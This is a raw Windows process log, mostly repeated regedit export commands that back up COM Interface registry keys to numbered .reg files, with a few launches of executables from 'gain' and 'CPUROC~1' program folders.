C:\Windows\SysWOW64\regedit.exe

/e "475.reg" "HKEY_CLASSES_ROOT\Interface\{000C03BF-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "476.reg" "HKEY_CLASSES_ROOT\Interface\{000C03C2-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "477.reg" "HKEY_CLASSES_ROOT\Interface\{000C03C5-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "478.reg" "HKEY_CLASSES_ROOT\Interface\{000C03C4-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "479.reg" "HKEY_CLASSES_ROOT\Interface\{000C03C3-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "480.reg" "HKEY_CLASSES_ROOT\Interface\{000C03BA-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "481.reg" "HKEY_CLASSES_ROOT\Interface\{000C03B9-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "482.reg" "HKEY_CLASSES_ROOT\Interface\{000C03B2-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "483.reg" "HKEY_CLASSES_ROOT\Interface\{000C03BB-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "484.reg" "HKEY_CLASSES_ROOT\Interface\{000C03BE-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "485.reg" "HKEY_CLASSES_ROOT\Interface\{000C03BD-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "486.reg" "HKEY_CLASSES_ROOT\Interface\{000C03BC-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "487.reg" "HKEY_CLASSES_ROOT\Interface\{000C0393-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "488.reg" "HKEY_CLASSES_ROOT\Interface\{000C037D-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "489.reg" "HKEY_CLASSES_ROOT\Interface\{000C037C-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "490.reg" "HKEY_CLASSES_ROOT\Interface\{000C037B-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "491.reg" "HKEY_CLASSES_ROOT\Interface\{000C037E-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "492.reg" "HKEY_CLASSES_ROOT\Interface\{000C0381-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "493.reg" "HKEY_CLASSES_ROOT\Interface\{000C0380-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "494.reg" "HKEY_CLASSES_ROOT\Interface\{000C037F-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "495.reg" "HKEY_CLASSES_ROOT\Interface\{000C0375-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "496.reg" "HKEY_CLASSES_ROOT\Interface\{000C0373-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "497.reg" "HKEY_CLASSES_ROOT\Interface\{000C0372-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "498.reg" "HKEY_CLASSES_ROOT\Interface\{000C0376-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "499.reg" "HKEY_CLASSES_ROOT\Interface\{000C037A-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "500.reg" "HKEY_CLASSES_ROOT\Interface\{000C0379-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "501.reg" "HKEY_CLASSES_ROOT\Interface\{000C0377-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "502.reg" "HKEY_CLASSES_ROOT\Interface\{000C038E-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "503.reg" "HKEY_CLASSES_ROOT\Interface\{000C038C-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "504.reg" "HKEY_CLASSES_ROOT\Interface\{000C038B-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "505.reg" "HKEY_CLASSES_ROOT\Interface\{000C038F-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "506.reg" "HKEY_CLASSES_ROOT\Interface\{000C0392-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "507.reg" "HKEY_CLASSES_ROOT\Interface\{000C0391-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "508.reg" "HKEY_CLASSES_ROOT\Interface\{000C0390-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "509.reg" "HKEY_CLASSES_ROOT\Interface\{000C0386-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "510.reg" "HKEY_CLASSES_ROOT\Interface\{000C0385-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "511.reg" "HKEY_CLASSES_ROOT\Interface\{000C0382-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "512.reg" "HKEY_CLASSES_ROOT\Interface\{000C0387-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\PROGRA~2\GAIN\fsg.exe

"C:\PROGRA~2\GAIN\fsg.exe"

\??\c:\program files (x86)\gain\fsg_4201a.exe

"c:\program files (x86)\gain\fsg_4201a.exe"

C:\Windows\SysWOW64\regedit.exe

/e "513.reg" "HKEY_CLASSES_ROOT\Interface\{000C038A-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "514.reg" "HKEY_CLASSES_ROOT\Interface\{000C0389-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "515.reg" "HKEY_CLASSES_ROOT\Interface\{000C0388-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "516.reg" "HKEY_CLASSES_ROOT\Interface\{000C1709-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "517.reg" "HKEY_CLASSES_ROOT\Interface\{000C1534-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "518.reg" "HKEY_CLASSES_ROOT\Interface\{000C1533-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "519.reg" "HKEY_CLASSES_ROOT\Interface\{000C170B-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "520.reg" "HKEY_CLASSES_ROOT\Interface\{000C1711-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "521.reg" "HKEY_CLASSES_ROOT\Interface\{000C1710-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "522.reg" "HKEY_CLASSES_ROOT\Interface\{000C170F-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "523.reg" "HKEY_CLASSES_ROOT\Interface\{000C0936-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "524.reg" "HKEY_CLASSES_ROOT\Interface\{000C0914-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "525.reg" "HKEY_CLASSES_ROOT\Interface\{000C0913-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "526.reg" "HKEY_CLASSES_ROOT\Interface\{000C101D-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "527.reg" "HKEY_CLASSES_ROOT\Interface\{000C1532-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "528.reg" "HKEY_CLASSES_ROOT\Interface\{000C1531-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "529.reg" "HKEY_CLASSES_ROOT\Interface\{000C1530-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "530.reg" "HKEY_CLASSES_ROOT\Interface\{000C1723-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "531.reg" "HKEY_CLASSES_ROOT\Interface\{000C171C-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "532.reg" "HKEY_CLASSES_ROOT\Interface\{000C171B-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "533.reg" "HKEY_CLASSES_ROOT\Interface\{000C1724-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "534.reg" "HKEY_CLASSES_ROOT\Interface\{000C1727-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "535.reg" "HKEY_CLASSES_ROOT\Interface\{000C1726-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "536.reg" "HKEY_CLASSES_ROOT\Interface\{000C1725-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "537.reg" "HKEY_CLASSES_ROOT\Interface\{000C1714-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "538.reg" "HKEY_CLASSES_ROOT\Interface\{000C1713-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "539.reg" "HKEY_CLASSES_ROOT\Interface\{000C1712-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "540.reg" "HKEY_CLASSES_ROOT\Interface\{000C1715-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "541.reg" "HKEY_CLASSES_ROOT\Interface\{000C1718-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "542.reg" "HKEY_CLASSES_ROOT\Interface\{000C1717-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "543.reg" "HKEY_CLASSES_ROOT\Interface\{000C1716-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "544.reg" "HKEY_CLASSES_ROOT\Interface\{000C0411-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "545.reg" "HKEY_CLASSES_ROOT\Interface\{000C03CF-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "546.reg" "HKEY_CLASSES_ROOT\Interface\{000C03CE-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "547.reg" "HKEY_CLASSES_ROOT\Interface\{000C03CD-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "548.reg" "HKEY_CLASSES_ROOT\Interface\{000C03D0-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "549.reg" "HKEY_CLASSES_ROOT\Interface\{000C03D3-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "550.reg" "HKEY_CLASSES_ROOT\Interface\{000C03D2-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\PROGRA~2\CPUROC~1\CPUROC~1.EXE

"C:\PROGRA~2\CPUROC~1\CPUROC~1.EXE"

C:\Windows\SysWOW64\regedit.exe

/e "822.reg" "HKEY_CLASSES_ROOT\Interface\{049FED7E-C3EA-4B66-9D92-10E8085D60FB}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "823.reg" "HKEY_CLASSES_ROOT\Interface\{049FED7E-C3EA-4B66-9D92-10E8085D60FB}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "824.reg" "HKEY_CLASSES_ROOT\Interface\{03C2AEA5-BEFA-4C84-A187-C9245AC784F6}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "825.reg" "HKEY_CLASSES_ROOT\Interface\{03C2AEA5-BEFA-4C84-A187-C9245AC784F6}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "826.reg" "HKEY_CLASSES_ROOT\Interface\{0776ae27-5ab9-4e18-9063-1836da63117a}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "827.reg" "HKEY_CLASSES_ROOT\Interface\{08A9E040-9A9C-4F42-B5F5-2029B8F17E1D}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "828.reg" "HKEY_CLASSES_ROOT\Interface\{066ACBCA-8881-49C9-BB98-FAE16B4889E1}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "829.reg" "HKEY_CLASSES_ROOT\Interface\{0776ae27-5ab9-4e18-9063-1836da63117a}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "830.reg" "HKEY_CLASSES_ROOT\Interface\{10C9242E-D604-49B5-99E4-BF87945EF86C}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "831.reg" "HKEY_CLASSES_ROOT\Interface\{000C172F-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "832.reg" "HKEY_CLASSES_ROOT\Interface\{000C1731-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "833.reg" "HKEY_CLASSES_ROOT\Interface\{000C1728-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "834.reg" "HKEY_CLASSES_ROOT\Interface\{000C1730-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "835.reg" "HKEY_CLASSES_ROOT\Interface\{143C8DCB-D37F-47F7-88E8-6B1D21F2C5F7}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "836.reg" "HKEY_CLASSES_ROOT\Interface\{14E469E0-BF61-11CF-8385-8F69D8F1350B}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "837.reg" "HKEY_CLASSES_ROOT\Interface\{1196AE48-D92B-4BC7-85DE-664EC3F761F1}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "838.reg" "HKEY_CLASSES_ROOT\Interface\{1196AE48-D92B-4BC7-85DE-664EC3F761F1}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "839.reg" "HKEY_CLASSES_ROOT\Interface\{000C172E-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "840.reg" "HKEY_CLASSES_ROOT\Interface\{000C172D-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "841.reg" "HKEY_CLASSES_ROOT\Interface\{10EF4AB3-4FAA-46C3-8832-B6247F0CF15C}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "842.reg" "HKEY_CLASSES_ROOT\Interface\{10EF4AB3-4FAA-46C3-8832-B6247F0CF15C}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "843.reg" "HKEY_CLASSES_ROOT\Interface\{000C172A-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "844.reg" "HKEY_CLASSES_ROOT\Interface\{000C1729-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "845.reg" "HKEY_CLASSES_ROOT\Interface\{000C172C-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "846.reg" "HKEY_CLASSES_ROOT\Interface\{000C172B-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "847.reg" "HKEY_CLASSES_ROOT\Interface\{02C98E2C-6C9F-49F8-9B57-3A6E1AA09A67}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "848.reg" "HKEY_CLASSES_ROOT\Interface\{000CD902-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "849.reg" "HKEY_CLASSES_ROOT\Interface\{000CD903-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "850.reg" "HKEY_CLASSES_ROOT\Interface\{000CD900-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "851.reg" "HKEY_CLASSES_ROOT\Interface\{000CD901-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "852.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB02-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "853.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB03-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "854.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB00-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "855.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB01-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "856.reg" "HKEY_CLASSES_ROOT\Interface\{000CD102-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "857.reg" "HKEY_CLASSES_ROOT\Interface\{000CD6A1-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "858.reg" "HKEY_CLASSES_ROOT\Interface\{000CD100-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "859.reg" "HKEY_CLASSES_ROOT\Interface\{000CD101-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "860.reg" "HKEY_CLASSES_ROOT\Interface\{000CD706-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "861.reg" "HKEY_CLASSES_ROOT\Interface\{000CD809-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "862.reg" "HKEY_CLASSES_ROOT\Interface\{000CD6A2-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "863.reg" "HKEY_CLASSES_ROOT\Interface\{000CD6A3-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "864.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB04-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "865.reg" "HKEY_CLASSES_ROOT\Interface\{00F20E90-2168-4CAB-A8E0-C7D0029965E6}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "866.reg" "HKEY_CLASSES_ROOT\Interface\{00FFD6C4-1A94-44BC-AD3E-8AC18552E3E6}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "867.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB10-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "868.reg" "HKEY_CLASSES_ROOT\Interface\{00194002-D9C3-11D3-8D59-0050048384E3}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "869.reg" "HKEY_CLASSES_ROOT\Interface\{0299ECA9-80B6-43C8-A79A-FB1C5F19E7D8}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "870.reg" "HKEY_CLASSES_ROOT\Interface\{02C98E2C-6C9F-49F8-9B57-3A6E1AA09A67}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "871.reg" "HKEY_CLASSES_ROOT\Interface\{00FFD6C4-1A94-44BC-AD3E-8AC18552E3E6}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "872.reg" "HKEY_CLASSES_ROOT\Interface\{0299ECA9-80B6-43C8-A79A-FB1C5F19E7D8}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "873.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB07-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "874.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB09-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "875.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB05-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "876.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB06-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "877.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB0E-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "878.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB0F-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "879.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB0A-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "880.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB0B-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "881.reg" "HKEY_CLASSES_ROOT\Interface\{22A68885-0FD9-42F6-9DED-4FB174DC7344}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "882.reg" "HKEY_CLASSES_ROOT\Interface\{214685F6-7B78-4681-87E0-495F739273D1}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "883.reg" "HKEY_CLASSES_ROOT\Interface\{2387C6BD-9A36-41A2-88ED-FF731E529384}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "884.reg" "HKEY_CLASSES_ROOT\Interface\{22A68885-0FD9-42F6-9DED-4FB174DC7344}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "885.reg" "HKEY_CLASSES_ROOT\Interface\{2072838A-316F-467A-A949-27F68C44A854}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "886.reg" "HKEY_CLASSES_ROOT\Interface\{2A792539-9CEA-4A63-A80A-A645FEF2046A}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "887.reg" "HKEY_CLASSES_ROOT\Interface\{1EDD003E-C446-43C5-8BA0-3778CC4792CC}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "888.reg" "HKEY_CLASSES_ROOT\Interface\{2A792539-9CEA-4A63-A80A-A645FEF2046A}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "889.reg" "HKEY_CLASSES_ROOT\Interface\{1F6342F2-D848-42E3-8995-C10A9EF9A3BA}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "890.reg" "HKEY_CLASSES_ROOT\Interface\{2692D1F2-2C7C-4AE0-8E73-8F37736C912D}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "891.reg" "HKEY_CLASSES_ROOT\Interface\{2692D1F2-2C7C-4AE0-8E73-8F37736C912D}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "892.reg" "HKEY_CLASSES_ROOT\Interface\{24785B20-135E-11D1-A2A7-00A0C9082766}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "893.reg" "HKEY_CLASSES_ROOT\Interface\{24785B20-135E-11D1-A2A7-00A0C9082766}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "894.reg" "HKEY_CLASSES_ROOT\Interface\{2A1C53C4-8638-4B3E-B518-2773C94556A3}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "895.reg" "HKEY_CLASSES_ROOT\Interface\{239D58CC-793C-4B64-8320-B51380087C0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "896.reg" "HKEY_CLASSES_ROOT\Interface\{2387C6BD-9A36-41A2-88ED-FF731E529384}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "897.reg" "HKEY_CLASSES_ROOT\Interface\{24785B20-135E-11D1-A2A7-00A0C9082766}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "898.reg" "HKEY_CLASSES_ROOT\Interface\{23ADBB16-0133-4906-B29A-1DCE1D026379}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "899.reg" "HKEY_CLASSES_ROOT\Interface\{1B71F23B-E61F-45C9-83BA-235D55F50CF9}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "900.reg" "HKEY_CLASSES_ROOT\Interface\{1B71F23B-E61F-45C9-83BA-235D55F50CF9}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "901.reg" "HKEY_CLASSES_ROOT\Interface\{1b7aed4f-fcaf-4da4-8795-c03e635d8edc}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "902.reg" "HKEY_CLASSES_ROOT\Interface\{2D719729-5333-406C-BF12-8DE787FD65E3}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "903.reg" "HKEY_CLASSES_ROOT\Interface\{198F17AE-B921-4308-9543-288D426A5C2B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "904.reg" "HKEY_CLASSES_ROOT\Interface\{18987285-971B-4C88-AEA9-2A5600861BA5}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "905.reg" "HKEY_CLASSES_ROOT\Interface\{14E469E0-BF61-11CF-8385-8F69D8F1350B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "906.reg" "HKEY_CLASSES_ROOT\Interface\{198F17AE-B921-4308-9543-288D426A5C2B}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "907.reg" "HKEY_CLASSES_ROOT\Interface\{18987285-971B-4C88-AEA9-2A5600861BA5}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "908.reg" "HKEY_CLASSES_ROOT\Interface\{2CE46480-1A08-11CF-AD63-00AA00614F3E}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "909.reg" "HKEY_CLASSES_ROOT\Interface\{1E9B00E4-9846-11D1-A1EE-00C04FC2FBE1}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "910.reg" "HKEY_CLASSES_ROOT\Interface\{2CE46480-1A08-11CF-AD63-00AA00614F3E}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "911.reg" "HKEY_CLASSES_ROOT\Interface\{1EDD003E-C446-43C5-8BA0-3778CC4792CC}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "912.reg" "HKEY_CLASSES_ROOT\Interface\{2CE4D4CF-B278-4126-AD1E-B622DA2E8339}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "913.reg" "HKEY_CLASSES_ROOT\Interface\{1b7aed4f-fcaf-4da4-8795-c03e635d8edc}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "914.reg" "HKEY_CLASSES_ROOT\Interface\{2CE4D4CF-B278-4126-AD1E-B622DA2E8339}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "915.reg" "HKEY_CLASSES_ROOT\Interface\{1D12BD3F-89B6-4077-AA2C-C9DC2BCA42F9}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "916.reg" "HKEY_CLASSES_ROOT\Interface\{2CE4D4CF-B278-4126-AD1E-B622DA2E8339}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "917.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDLLs"

C:\Windows\SysWOW64\regedit.exe

